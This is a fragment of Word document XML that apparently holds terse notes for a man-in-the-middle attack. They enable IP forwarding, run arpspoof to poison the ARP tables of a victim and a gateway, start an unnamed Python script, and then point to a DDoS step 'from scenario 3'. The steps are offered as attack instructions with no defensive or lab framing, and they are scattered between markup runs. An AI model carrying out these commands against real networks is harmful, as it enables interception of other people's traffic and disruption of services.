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Man In The Middle Attack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 : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 1 &gt;  /proc/sys/net/ipv4/ip_forward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2: arpspoof -i eth0 -t victim_ip -r gateway_ip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python3 start.py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step 3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">need to provide the request.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4: DDOS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from scenario 3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